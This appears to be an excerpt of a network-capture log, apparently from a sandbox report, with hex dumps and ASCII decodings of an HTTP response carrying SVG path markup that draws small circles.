                                                                                                                                                                                                                                                                                                      Data Ascii: 2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M765,259.07a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M764.75,251.36a1.91,1.91,0,0,1-.87,2.48,2.79
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC2851INData Raw: 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 35 33 2e 33 34 2c 32 36 38 2e 32 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                                                                      Data Ascii: 12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M653.34,268.22a2.16,2.16,0,0,1-1.09,2.75,3.17,3.17,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC2867INData Raw: 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 38 38 2e 30 38 2c 33 32 39 2e 32 39 41 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2c 36 38 37 2c 33 33 32 61 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64
                                                                                                                                                                                                                                                                                                      Data Ascii: 1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M688.08,329.29A2.16,2.16,0,0,1,687,332a3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC2883INData Raw: 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 32 2e 38 31 2c 33 39 30 2e 33 36 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 32 2e 38 39 2c 33 38 31 2e 36
                                                                                                                                                                                                                                                                                                      Data Ascii: 0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M722.81,390.36a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M722.89,381.6
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC2899INData Raw: 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 35 35 2c 34 35 31 2e 34 34 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 36 32 2c 34 34 32 2e 37 36 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c
                                                                                                                                                                                                                                                                                                      Data Ascii: ,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M757.55,451.44a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M757.62,442.76a2.14,2.14,0,0,1-1.09,2.75,
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC2915INData Raw: 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 36 32 2c 32 36 39 2e 33 39 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 37 2c 32 36 30 2e 37 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30
                                                                                                                                                                                                                                                                                                      Data Ascii: 66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M785.62,269.39a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.19,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M785.7,260.71a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC2931INData Raw: 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 33 36 2c 33 33 30 2e 34 36 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 36 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 34 34 2c 33 32 31 2e 37 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37
                                                                                                                                                                                                                                                                                                      Data Ascii: ath class="cls-9" d="M820.36,330.46a2.16,2.16,0,0,1-1.09,2.76,3.17,3.17,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M820.44,321.78a2.16,2.16,0,0,1-1.1,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.7
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC2947INData Raw: 3d 22 4d 38 35 35 2e 31 2c 33 39 31 2e 35 34 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 35 35 2e 31 37 2c 33 38 32 2e 38 36 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c
                                                                                                                                                                                                                                                                                                      Data Ascii: ="M855.1,391.54a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M855.17,382.86a2.15,2.15,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC2963INData Raw: 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 38 39 2e 39 31 2c 34 34 33 2e 39 33 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 2f 3e 3c
                                                                                                                                                                                                                                                                                                      Data Ascii: .09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.64,2.64,0,0,1,0,3.57"/><path class="cls-9" d="M889.91,443.93a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.8-3.58,2.8,2.8,0,0,1,3.61.2,2.64,2.64,0,0,1,0,3.57"/><
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC2979INData Raw: 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 38 2c 32 36 31 2e 38 39 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c
                                                                                                                                                                                                                                                                                                      Data Ascii: 6,0,0,1-1.1,2.75,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.61.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M918,261.89a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC2995INData Raw: 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 35 32 2e 37 32 2c 33 32 33 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c
                                                                                                                                                                                                                                                                                                      Data Ascii: 4,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.19,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M952.72,323a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"/><path class="cl
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3011INData Raw: 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 2e 38 37 2c 32 36 30 2e 34 31 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 2e 35 38 2c 32 35 31 2e 36 33 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31
                                                                                                                                                                                                                                                                                                      Data Ascii: 84,2.84,0,0,1,3.66,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M59.87,260.41a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M59.58,251.63a2.19,2.19,0,0,1-1
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3027INData Raw: 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 39 37 2e 33 33 2c 33 31 31 2e 38 37 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d
                                                                                                                                                                                                                                                                                                      Data Ascii: 18,0,0,1-4.22-1.19,3,3,0,0,1,.65-3.66,2.84,2.84,0,0,1,3.66.05,2.68,2.68,0,0,1,.2,3.61"/><path class="cls-7" d="M97.33,311.87a2.17,2.17,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class=
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3044INData Raw: 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 31 37 2e 38 35 2c 31 32 36 2e 36 31 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 31 37 2e 35 36 2c 31 31 37 2e 38 33 61 32 2e 31 39 2c 32 2e 31 39
                                                                                                                                                                                                                                                                                                      Data Ascii: 66,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.2,3.61"/><path class="cls-7" d="M117.85,126.61a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.67,2.67,0,0,1,.19,3.61"/><path class="cls-7" d="M117.56,117.83a2.19,2.19
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3060INData Raw: 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 35 35 2e 36 31 2c 31 38 36 2e 38 36 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 35 35
                                                                                                                                                                                                                                                                                                      Data Ascii: -1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M155.61,186.86a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.2,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M155
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3076INData Raw: 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 39 33 2e 33 37 2c 32 34 37 2e 31 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 39 33 2e 30 37 2c 32 33 38 2e 33 32 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c
                                                                                                                                                                                                                                                                                                      Data Ascii: 7,2.67,0,0,1,.19,3.61"/><path class="cls-7" d="M193.37,247.1a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.2,3.61"/><path class="cls-7" d="M193.07,238.32a2.18,2.18,0,0,1-1,2.83,3.18,3.18,
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3092INData Raw: 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 33 31 2e 31 32 2c 33 30 37 2e 33 35 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32
                                                                                                                                                                                                                                                                                                      Data Ascii: -1.19,3,3,0,0,1,.65-3.65,2.84,2.84,0,0,1,3.66,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M231.12,307.35a2.16,2.16,0,0,1-1,2.82,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M2
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3108INData Raw: 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 35 31 2e 36 34 2c 31 32 32 2e 30 38 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22
